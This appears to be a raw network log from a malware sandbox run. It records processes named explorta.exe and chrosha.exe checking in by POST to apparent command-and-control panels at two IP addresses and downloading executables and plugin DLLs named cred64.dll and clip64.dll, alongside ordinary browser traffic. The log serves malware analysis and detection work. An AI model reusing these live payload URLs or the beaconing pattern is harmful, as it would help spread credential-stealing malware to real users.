                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/cost/sarra.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /cost/sarra.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:32 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 2374144
                                        Last-Modified: Sat, 27 Apr 2024 15:51:14 GMT
                                        Connection: keep-alive
                                        ETag: "662d1ef2-243a00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/mine/amert.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /mine/amert.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:34 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1895424
                                        Last-Modified: Sat, 27 Apr 2024 15:51:47 GMT
                                        Connection: keep-alive
                                        ETag: "662d1f13-1cec00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/mine/random.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /mine/random.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:36 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1166336
                                        Last-Modified: Sat, 27 Apr 2024 15:50:45 GMT
                                        Connection: keep-alive
                                        ETag: "662d1ed5-11cc00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/cost/random.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /cost/random.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:38 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 2413056
                                        Last-Modified: Sat, 27 Apr 2024 15:50:59 GMT
                                        Connection: keep-alive
                                        ETag: "662d1ee3-24d200"
                                        Accept-Ranges: bytes
                                      • flag-us
                                        DNS
                                        139.132.233.193.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        139.132.233.193.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        167.132.233.193.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        167.132.233.193.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        www.youtube.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        www.youtube.com
                                        IN A
                                        Response
                                        www.youtube.com
                                        IN CNAME
                                        youtube-ui.l.google.com
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.179.238
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.180.14
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.187.206
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.187.238
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.178.14
                                        youtube-ui.l.google.com
                                        IN A
                                        172.217.16.238
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.200.14
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.200.46
                                        youtube-ui.l.google.com
                                        IN A
                                        216.58.201.110
                                        youtube-ui.l.google.com
                                        IN A
                                        216.58.204.78
                                        youtube-ui.l.google.com
                                        IN A
                                        216.58.212.206
                                      • flag-gb
                                        GET
                                        https://www.youtube.com/account
                                        chrome.exe
                                        Remote address:
                                        142.250.179.238:443
                                        Request
                                        GET /account HTTP/2.0
                                        host: www.youtube.com
                                        sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        upgrade-insecure-requests: 1
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-wow64: ?0
                                        sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                                        x-client-data: CJHdygE=
                                        sec-fetch-site: none
                                        sec-fetch-mode: navigate
                                        sec-fetch-user: ?1
                                        sec-fetch-dest: document
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        accounts.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        accounts.google.com
                                        IN A
                                        Response
                                        accounts.google.com
                                        IN A
                                        173.194.69.84
                                      • flag-us
                                        DNS
                                        195.187.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        195.187.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        195.187.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s33-in-f31e100net
                                      • flag-us
                                        DNS
                                        234.187.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        234.187.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        234.187.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s34-in-f101e100net
                                      • flag-us
                                        DNS
                                        238.179.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        238.179.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        238.179.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s31-in-f141e100net
                                      • flag-us
                                        DNS
                                        content-autofill.googleapis.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        content-autofill.googleapis.com
                                        IN A
                                        Response
                                        content-autofill.googleapis.com
                                        IN A
                                        172.217.16.234
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.200.10
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.200.42
                                        content-autofill.googleapis.com
                                        IN A
                                        216.58.201.106
                                        content-autofill.googleapis.com
                                        IN A
                                        216.58.204.74
                                        content-autofill.googleapis.com
                                        IN A
                                        216.58.212.202
                                        content-autofill.googleapis.com
                                        IN A
                                        172.217.169.74
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.179.234
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.180.10
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.187.202
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.187.234
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.178.10
                                      • flag-gb
                                        GET
                                        https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                        chrome.exe
                                        Remote address:
                                        172.217.16.234:443
                                        Request
                                        GET /v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto HTTP/2.0
                                        host: content-autofill.googleapis.com
                                        x-goog-encode-response-if-executable: base64
                                        x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                        x-client-data: CJHdygE=
                                        sec-fetch-site: none
                                        sec-fetch-mode: no-cors
                                        sec-fetch-dest: empty
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        accounts.youtube.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        accounts.youtube.com
                                        IN A
                                        Response
                                        accounts.youtube.com
                                        IN CNAME
                                        www3.l.google.com
                                        www3.l.google.com
                                        IN A
                                        172.217.16.238
                                      • flag-us
                                        DNS
                                        84.69.194.173.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        84.69.194.173.in-addr.arpa
                                        IN PTR
                                        Response
                                        84.69.194.173.in-addr.arpa
                                        IN PTR
                                        ef-in-f841e100net
                                      • flag-us
                                        DNS
                                        3.180.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        3.180.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        3.180.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s32-in-f31e100net
                                      • flag-us
                                        DNS
                                        227.212.58.216.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        Response
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        lhr25s28-in-f31e100net
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        ams16s22-in-f3�H
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        ams16s22-in-f227�H
                                      • flag-us
                                        DNS
                                        234.16.217.172.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        234.16.217.172.in-addr.arpa
                                        IN PTR
                                        Response
                                        234.16.217.172.in-addr.arpa
                                        IN PTR
                                        lhr48s28-in-f101e100net
                                        234.16.217.172.in-addr.arpa
                                        IN PTR
                                        mad08s04-in-f10�I
                                      • flag-gb
                                        GET
                                        https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684
                                        chrome.exe
                                        Remote address:
                                        172.217.16.238:443
                                        Request
                                        GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684 HTTP/2.0
                                        host: accounts.youtube.com
                                        sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-full-version: "110.0.5481.104"
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-wow64: ?0
                                        sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                                        upgrade-insecure-requests: 1
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        x-client-data: CJHdygE=
                                        sec-fetch-site: cross-site
                                        sec-fetch-mode: navigate
                                        sec-fetch-dest: iframe
                                        referer: https://accounts.google.com/
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                        cookie: YSC=YS5PzM7dWFk
                                        cookie: VISITOR_INFO1_LIVE=dZ-UnFWGjCk
                                        cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLQ%3D%3D
                                      • flag-gb
                                        GET
                                        https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1
                                        chrome.exe
                                        Remote address:
                                        172.217.16.238:443
                                        Request
                                        GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1 HTTP/2.0
                                        host: clients2.google.com
                                        sec-fetch-site: none
                                        sec-fetch-mode: no-cors
                                        sec-fetch-dest: empty
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        www.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        www.google.com
                                        IN A
                                        Response
                                        www.google.com
                                        IN A
                                        142.250.178.4
                                      • flag-us
                                        DNS
                                        238.16.217.172.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        238.16.217.172.in-addr.arpa
                                        IN PTR
                                        Response
                                        238.16.217.172.in-addr.arpa
                                        IN PTR
                                        lhr48s28-in-f141e100net
                                        238.16.217.172.in-addr.arpa
                                        IN PTR
                                        mad08s04-in-f14�I
                                      • flag-us
                                        DNS
                                        4.178.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        4.178.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        4.178.250.142.in-addr.arpa
                                        IN PTR
                                        lhr48s27-in-f41e100net
                                      • flag-us
                                        DNS
                                        clients2.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        clients2.google.com
                                        IN A
                                        Response
                                        clients2.google.com
                                        IN CNAME
                                        clients.l.google.com
                                        clients.l.google.com
                                        IN A
                                        172.217.16.238
                                      • flag-us
                                        DNS
                                        play.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        play.google.com
                                        IN A
                                        Response
                                        play.google.com
                                        IN A
                                        142.250.187.206
                                      • flag-gb
                                        OPTIONS
                                        https://play.google.com/log?format=json&hasfast=true&authuser=0
                                        chrome.exe
                                        Remote address:
                                        142.250.187.206:443
                                        Request
                                        OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                        host: play.google.com
                                        accept: */*
                                        access-control-request-method: POST
                                        access-control-request-headers: x-goog-authuser
                                        origin: https://accounts.google.com
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        sec-fetch-mode: cors
                                        sec-fetch-site: same-site
                                        sec-fetch-dest: empty
                                        referer: https://accounts.google.com/
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        206.187.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        206.187.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        206.187.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s33-in-f141e100net
                                      • flag-us
                                        DNS
                                        86.23.85.13.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        86.23.85.13.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        56.126.166.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        56.126.166.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 4
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 158
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/enigma/Plugins/cred64.dll
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /enigma/Plugins/cred64.dll HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:12 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1285632
                                        Last-Modified: Thu, 01 Feb 2024 16:00:36 GMT
                                        Connection: keep-alive
                                        ETag: "65bbc024-139e00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/enigma/Plugins/clip64.dll
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /enigma/Plugins/clip64.dll HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:23 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 112128
                                        Last-Modified: Thu, 01 Feb 2024 16:00:35 GMT
                                        Connection: keep-alive
                                        ETag: "65bbc023-1b600"
                                        Accept-Ranges: bytes
                                      • flag-us
                                        DNS
                                        17.14.97.104.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        17.14.97.104.in-addr.arpa
                                        IN PTR
                                        Response
                                        17.14.97.104.in-addr.arpa
                                        IN PTR
                                        a104-97-14-17deploystaticakamaitechnologiescom
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        rundll32.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 21
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Refresh: 0; url = Login.php
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        rundll32.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 5
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-us
                                        DNS
                                        249.197.17.2.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        249.197.17.2.in-addr.arpa
                                        IN PTR
                                        Response
                                        249.197.17.2.in-addr.arpa
                                        IN PTR
                                        a2-17-197-249deploystaticakamaitechnologiescom
                                      • flag-us
                                        DNS
                                        beacons.gcp.gvt2.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        beacons.gcp.gvt2.com
                                        IN A
                                        Response
                                        beacons.gcp.gvt2.com
                                        IN CNAME
                                        beacons-handoff.gcp.gvt2.com
                                        beacons-handoff.gcp.gvt2.com
                                        IN A
                                        192.178.49.163
                                      • flag-us
                                        POST
                                        https://beacons.gcp.gvt2.com/domainreliability/upload
                                        chrome.exe
                                        Remote address:
                                        192.178.49.163:443
                                        Request
                                        POST /domainreliability/upload HTTP/2.0
                                        host: beacons.gcp.gvt2.com
                                        content-length: 300
                                        content-type: application/json; charset=utf-8
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                        Response
                                        HTTP/2.0 200
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        date: Sat, 27 Apr 2024 17:09:43 GMT
                                        content-type: text/html
                                        content-type: text/html
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        content-type: text/html
                                      • flag-us
                                        OPTIONS
                                        https://beacons.gcp.gvt2.com/domainreliability/upload-nel
                                        chrome.exe
                                        Remote address:
                                        192.178.49.163:443
                                        Request
                                        OPTIONS /domainreliability/upload-nel HTTP/2.0
                                        host: beacons.gcp.gvt2.com
                                        origin: https://accounts.google.com
                                        access-control-request-method: POST
                                        access-control-request-headers: content-type
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                        Response
                                        HTTP/2.0 200
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        date: Sat, 27 Apr 2024 17:09:43 GMT
                                        content-type: text/html
                                        content-type: text/html
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        content-type: text/html
                                      • flag-us
                                        POST
                                        https://beacons.gcp.gvt2.com/domainreliability/upload-nel
                                        chrome.exe
                                        Remote address:
                                        192.178.49.163:443
                                        Request
                                        POST /domainreliability/upload-nel HTTP/2.0
                                        host: beacons.gcp.gvt2.com
                                        content-length: 405
                                        content-type: application/reports+json
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        163.49.178.192.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        163.49.178.192.in-addr.arpa
                                        IN PTR
                                        Response
                                        163.49.178.192.in-addr.arpa
                                        IN PTR
                                        phx19s05-in-f31e100net
                                      • flag-us
                                        DNS
                                        48.229.111.52.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        48.229.111.52.in-addr.arpa
                                        IN PTR
                                        Response
                                      • 204.79.197.237:443
                                        https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E
                                        tls, http2
                                        2.5kB
                                        9.0kB
                                        20
                                        17

                                        HTTP Request

                                        GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

                                        HTTP Response

                                        204

                                        HTTP Request

                                        GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E

                                        HTTP Response

                                        204
                                      • 23.62.61.194:443
                                        https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893
                                        tls, http2
                                        1.5kB
                                        5.4kB
                                        17
                                        12

                                        HTTP Request

                                        GET https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893

                                        HTTP Response

                                        200
                                      • 193.233.132.139:80
                                        http://193.233.132.139/sev56rkm/index.php
                                        http
                                        explorta.exe
                                        1.9kB
                                        2.1kB
                                        16
                                        13

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200

                                        HTTP Request

                                        POST http://193.233.132.139/sev56rkm/index.php

                                        HTTP Response

                                        200
                                      • 193.233.132.167:80
                                        http://193.233.132.167/cost/random.exe
                                        http
                                        explorta.exe
                                        274.8kB
                                        8.1MB
                                        5794
                                        5793

                                        HTTP Request

                                        GET http://193.233.132.167/cost/sarra.exe

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/mine/amert.exe

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/mine/random.exe

                                        HTTP Response

                                        200

                                        HTTP Request

                                        GET http://193.233.132.167/cost/random.exe

                                        HTTP Response

                                        200
                                      • 142.250.179.238:443
                                        www.youtube.com
                                        tls, http2
                                        chrome.exe
                                        1.0kB
                                        8.4kB
                                        10
                                        10
                                      • 142.250.179.238:443
                                        https://www.youtube.com/account
                                        tls, http2
